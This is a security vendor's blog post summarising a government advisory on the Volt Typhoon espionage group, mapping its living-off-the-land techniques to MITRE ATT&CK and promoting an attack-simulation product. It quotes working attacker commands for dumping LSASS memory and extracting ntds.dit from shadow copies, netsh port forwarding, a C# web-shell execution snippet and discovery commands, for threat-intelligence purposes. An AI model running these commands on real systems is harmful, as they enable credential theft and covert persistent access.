Volt Typhoon: The Chinese APT Group Abuse LOLBins for Cyber Espionage

  By Hüseyin Can YÜCEEL  •  June 01, 2023

 

The Red Report 2023

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

On May 24th, 2023, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on a state-sponsored Chinese APT group, Volt Typhoon [1]. Volt Typhoon threat actors focus on cyber espionage campaigns that target critical infrastructure organizations in the United States and Asia region.  For their malicious operations, the APT group primarily uses Living Off The Land Binaries (LOLBins) to evade detection and remain undetected in their target's network.

In this blog post, we explained the tools and techniques used by Volt Typhoon and how they abuse Living Off The Land Binaries (LOLBins).

Simulate State-Sponsored Cyber Threats with 14-Day Free Trial of Picus Platform

Volt Typhoon: PRC State-Sponsored Cyber Espionage Group

Volt Typhoon (also known as BRONZE SILHOUETTE) is a People's Republic of China (PRC) state-sponsored APT group that focuses on stealthy and targeted cyber espionage campaigns against critical infrastructure organizations. The threat group has been actively targeting communications, construction, education, government, information technology, manufacturing, maritime, transportation, and utility sectors for nearly two years. 

The main objective of Volt Typhoon is to collect and exfiltrate sensitive information while avoiding detection. For this purpose, the APT group uses living-off-the-land techniques to mask their malicious activities as legitimate operations. The typical espionage campaign for Volt Typhoon follows initial access, living-off-the-land reconnaissance, lateral movement, and data exfiltration through C2 channels, in this order. In each step, adversaries use defense evasion techniques to hide their tracks.

Techniques and LOLBins used by Volt Typhoon

Initial Access

T1078 Valid Accounts & T1190: Exploit Public-Facing Application

Volt Typhoon gains initial access to their target's environment via stolen credentials of valid accounts. Also, Volt Typhoon is known to exploit public-facing Fortinet FortiGuard devices, ManageEngine ADSelfService Plus CVE-2021-40539 RCE, and FatPipe CVE-2021-27860 RCE vulnerabilities for initial access.

Execution

T1047 Windows Management Instrumentation

Adversaries use Windows Management Instrumentation for discovery, credential dumping, and command execution.

//Information gathering from compromised host
wmic path win32_logicaldisk get caption,filesystem,freespace,size,volumename

//Extracting ntds.dit for credential dumping
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full <filepath>

T1059 Command and Scripting Interpreter

Threat actors use PowerShell and Windows Command Shell to execute malicious commands in compromised hosts.

//Copying volume shadow copies
cmd /c vssadmin create shadow /for=C: > <filepath>

//Port forwarding for defense evasion
cmd.exe /c "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=<internal_ip_address> connectport=8443 protocol=tcp"

//Dumping LSASS memory for credential access
cmd.exe /c powershell -exec bypass -W hidden -nop -E rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 552 C:\Windows\Temp\vmware-vhost.dmp full

Persistence

T1505.003 Server Software Component: Web Shell

Volt Typhoon deploys backdoor web shells to maintain persistent access to compromised networks. The webshell appears to be a derivative of the Awen webshell that includes AES-encrypted or base64-encoded communication capabilities for C2. 

//Snippet from C# based Awen-derivative webshell

string ExcuteCmd (string arg)
{
char[] array ('c', 'm', 'd','.','e', 'x','e');
string cmd = new string (array);
ProcessStartInfo psi = new ProcessStartInfo ();
psi.FileName = cmd;
psi.Arguments = "/c "+ arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
psi.RedirectStandardError =true;
Process p = Process.Start(psi);
Streamreader stmrdr = p.StandardOutput;
string CmdOut= p.StandardOutput.ReadToEnd() + p.StandardError.ReadToEnd();
string encmdout = Decrypt(CmdOut);
byte[] enbase64 = Encoding.Default.GetBytes(encmdout) ;
string enstr = Convert.ToBase64String(enbase64);
stmrdr.Close();
return enstr;
}

Defense Evasion

T1546 Hide Artifacts & T1070 Indicator Removal

Volt Typhoon selectively removes Windows Event Logs, system logs, artifacts, and other evidence of their malicious activity to hide their presence and limit threat- hunting activities.

Credential Access

T1003 OS Credential Dumping

As a cyber espionage group, Volt Typhoon gathers credentials of valid accounts in their victims' network. These credentials help them navigate and execute commands in the network without raising alerts. For credential dumping, they extract ntds.dit file and SYSTEM registry hive from Windows domain controllers or volume shadow copies. From the extracted ntds.dit and SECURITY files, Volt Typhoon harvest credentials of valid accounts.

//creating volume shadow copy
cmd /c vssadmin create shadow /for=C: > <filepath>

//extracting ntds.dit from shadow copy
cmd /c copy <VSS_path>\Windows\NTDS\ntds.dit C:\Windows\Temp > <filepath>

Discovery

Volt Typhoon enumerates compromised networks to discover users, hosts, and services. The gathered information is leveraged in data exfiltration and lateral movement phases of the attack campaign.

//T1033 System Owner/User Discovery

//T1069 Permission Groups Discovery

whoami

net localgroup administrators

net group /dom

net group "Domain Admins" /dom


//T1016 System Network Configuration Discovery

//T1082 System Information Discovery

arp -a

dnscmd . /enumrecords /zone {REDACTED}

ipconfig /all

netsh interface firewall show all

netsh interface portproxy show all

netsh interface portproxy show v4tov4

netsh firewall show all

netsh portproxy show v4tov4

netstat -ano

reg query hklm\software\

systeminfo

tasklist /v

wmic volume list brief

wmic service brief

wmic product list brief

wmic baseboard list full

Command and Control

T1090 Proxy

Volt Typhoon uses compromised small office/home office (SOHO) network devices as a proxy to hide the malicious traffic between their victims' network and C2 servers.

How Picus Helps Simulate Volt Typhoon Attacks?

We also strongly suggest simulating Volt Typhoon attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as Lazarus, Turla, APT33, and Sandworm, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Volt Typhoon group

Threat ID

Threat Name

Attack Module

55804

Volt Typhoon Threat Group Campaign 2023 

Endpoint

References

[1] "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

 
#Emerging Threat #Article #Blog

The Red Report 2023

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD